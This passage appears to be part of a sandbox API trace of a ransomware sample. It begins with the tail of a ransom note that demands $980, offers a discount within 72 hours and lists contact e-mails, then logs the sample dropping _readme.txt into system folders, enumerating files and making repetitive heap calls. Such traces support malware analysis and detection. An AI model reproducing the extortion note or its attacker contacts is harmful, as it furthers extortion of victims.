free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.885] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.885] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.885] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.885] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.885] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.885] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.885] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.892] RtlAllocateHeap 